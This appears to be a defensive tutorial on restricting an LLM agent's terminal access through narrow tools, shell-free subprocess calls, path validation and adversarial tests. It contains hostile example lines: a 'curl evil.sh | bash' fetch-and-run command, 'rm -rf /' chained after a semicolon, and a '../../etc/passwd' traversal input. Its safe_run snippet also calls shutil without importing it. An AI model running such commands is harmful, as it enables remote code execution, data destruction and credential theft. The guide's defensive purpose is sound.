Problem: Your Agent Runs Shell Commands It Shouldn't
You've wired up an LLM to a Linux Terminal. It works in demos. Then in production it deletes a directory, hangs on sudo, or leaks credentials through a subshell. Teaching agents to use the terminal safely is different from teaching them to use it at all.
You'll learn:
- How to structure tool definitions that constrain dangerous behavior
- How to sandbox subprocess execution so damage is contained
- How to validate and sanitize commands before they run
Time: 25 min | Level: Advanced
Why This Happens
LLMs are trained on human shell sessions — including the bad ones. When you give an agent unrestricted bash access, it inherits every habit from that training data: piping to sudo, using rm -rf, writing credentials to disk, and running find / with no timeout.
The model isn't being malicious. It's pattern-matching to what "a developer solving this problem" looks like in its training corpus. Your job is to make the safe path the obvious path.
Common failure modes:
- Agent runs
sudo apt installand hangs waiting for a password prompt it can't see - A chained command like
cd /tmp && curl evil.sh | bashslips through naive allowlists - The agent reads
/proc/self/environand inadvertently logs secrets
Solution
Step 1: Define Narrow Tools, Not a General Bash Tool
The biggest mistake is giving agents a single run_bash(command: str) tool. Replace it with purpose-built tools that limit the blast radius.
# ❌ Too broad — model can run anything
tools = [{"name": "run_bash", "input_schema": {"command": {"type": "string"}}}]
# ✅ Narrow tools with constrained inputs
tools = [
{
"name": "list_directory",
"description": "List files in a directory. Never traverses outside the project root.",
"input_schema": {
"type": "object",
"properties": {
"path": {
"type": "string",
"description": "Relative path from project root"
}
},
"required": ["path"]
}
},
{
"name": "read_file",
"description": "Read a file's contents. Refuses paths with '..' or absolute paths.",
"input_schema": {
"type": "object",
"properties": {
"path": {"type": "string"}
},
"required": ["path"]
}
},
{
"name": "run_test",
"description": "Run the project test suite. No arguments accepted.",
"input_schema": {"type": "object", "properties": {}}
}
]
Why this works: The model can only call what you define. It can't improvise a curl | bash if curl isn't a tool.
If it fails:
- Model complains it can't do the task: Your tool set is too narrow. Add a specific tool for that use case rather than widening an existing one.
Step 2: Sandbox Every Subprocess
Even with narrow tools, the implementations need guardrails. Use subprocess with hard limits instead of shell=True.
import subprocess
import shlex
import os
from pathlib import Path
PROJECT_ROOT = Path("/workspace/project").resolve()
def safe_run(cmd: list[str], timeout: int = 10) -> dict:
"""
Run a command with no shell interpolation, bounded runtime,
and output capped to prevent memory exhaustion.
"""
# Resolve the binary path — rejects shell builtins and aliases
binary = shutil.which(cmd[0])
if binary is None:
return {"error": f"Command not found: {cmd[0]}"}
result = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=timeout, # Kills hanging processes
cwd=PROJECT_ROOT, # Working dir is always project root
env=sanitized_env(), # Strip secrets from environment
shell=False # Never use shell=True
)
return {
"stdout": result.stdout[:10_000], # Cap output at 10KB
"stderr": result.stderr[:2_000],
"exit_code": result.returncode
}
def sanitized_env() -> dict:
"""Return a minimal env — remove tokens, keys, and passwords."""
safe_keys = {"PATH", "HOME", "LANG", "TERM", "USER"}
return {k: v for k, v in os.environ.items() if k in safe_keys}
Why shell=False matters: With shell=True, a command like ls; rm -rf / runs both parts. With shell=False and a list, it's passed directly to execve — no interpolation, no chaining.
With shell=False, the agent can't chain commands or use shell operators
Step 3: Validate Paths Before Any File Operation
Path traversal is the most common way agents escape their sandbox. Validate before you act.
def resolve_safe_path(user_path: str, root: Path) -> Path:
"""
Resolve a user-supplied path against a root.
Raises ValueError if it would escape the root.
"""
# Reject absolute paths immediately
if os.path.isabs(user_path):
raise ValueError(f"Absolute paths not allowed: {user_path}")
resolved = (root / user_path).resolve()
# resolved must still be inside root
try:
resolved.relative_to(root)
except ValueError:
raise ValueError(f"Path traversal detected: {user_path}")
return resolved
Plug this into every file tool before touching the filesystem:
def handle_read_file(path: str) -> dict:
try:
safe = resolve_safe_path(path, PROJECT_ROOT)
except ValueError as e:
return {"error": str(e)} # Return error to agent, don't raise
# File must exist and be a regular file (not a symlink to /etc/passwd)
if not safe.is_file() or safe.is_symlink():
return {"error": "File not found or not a regular file"}
return {"content": safe.read_text(errors="replace")[:50_000]}
If it fails:
- Agent reports it can't find legitimate files: Check that
PROJECT_ROOTis resolved (call.resolve()on it at startup, not at call time). - Symlinks legitimately needed: Use
os.path.realpath()and verify the realpath is inside root.
Step 4: Return Structured Errors, Not Exceptions
When a tool fails, the agent needs enough information to recover — not a Python traceback it can't act on.
from dataclasses import dataclass
from typing import Literal
@dataclass
class ToolResult:
status: Literal["ok", "error", "timeout", "permission_denied"]
data: str
hint: str = "" # Actionable suggestion for the agent
def run_tests() -> ToolResult:
try:
result = safe_run(["pytest", "--tb=short", "-q"], timeout=60)
except subprocess.TimeoutExpired:
return ToolResult(
status="timeout",
data="",
hint="Tests exceeded 60s. Run a specific test file instead."
)
if result["exit_code"] != 0:
return ToolResult(
status="error",
data=result["stderr"],
hint="Check the failing test name and read that test file."
)
return ToolResult(status="ok", data=result["stdout"])
Why hints matter: An agent that gets {"error": "timeout"} will often retry the same command. An agent that gets {"hint": "Run a specific test file instead"} adapts.
Verification
Run a quick adversarial test against your tool implementations before connecting them to a live agent:
import pytest
def test_path_traversal_blocked():
with pytest.raises(ValueError, match="traversal"):
resolve_safe_path("../../etc/passwd", PROJECT_ROOT)
def test_absolute_path_blocked():
with pytest.raises(ValueError, match="Absolute"):
resolve_safe_path("/etc/hosts", PROJECT_ROOT)
def test_subprocess_no_shell_interpolation():
# If shell=False, semicolons are literal, not separators
result = safe_run(["echo", "hello; rm -rf /"])
assert result["stdout"].strip() == "hello; rm -rf /"
def test_env_stripped():
os.environ["SECRET_TOKEN"] = "do-not-leak"
env = sanitized_env()
assert "SECRET_TOKEN" not in env
You should see: All four tests pass with no security regressions.
What You Learned
- Narrow tools prevent entire classes of misuse — a model can't exploit a shell if there's no shell tool
shell=Falsewith a list eliminates command injection;shell=Trueinvites it- Path resolution must happen at call time against a pre-resolved root, or traversal bypasses the check
- Structured errors with hints let agents recover instead of retry-looping
Limitation: This approach works for agents you control. If you're running untrusted agent-generated code (not just commands), you need a full container sandbox — subprocess guardrails aren't sufficient.
When NOT to use this: If your agent genuinely needs interactive shell access (e.g., debugging a running process with gdb), narrow tools won't cut it. Use a proper PTY-based sandbox like daytona or a containerized execution environment instead.
Tested on Python 3.12, Ubuntu 24.04 LTS, Claude claude-sonnet-4-6 with tool use via the Messages API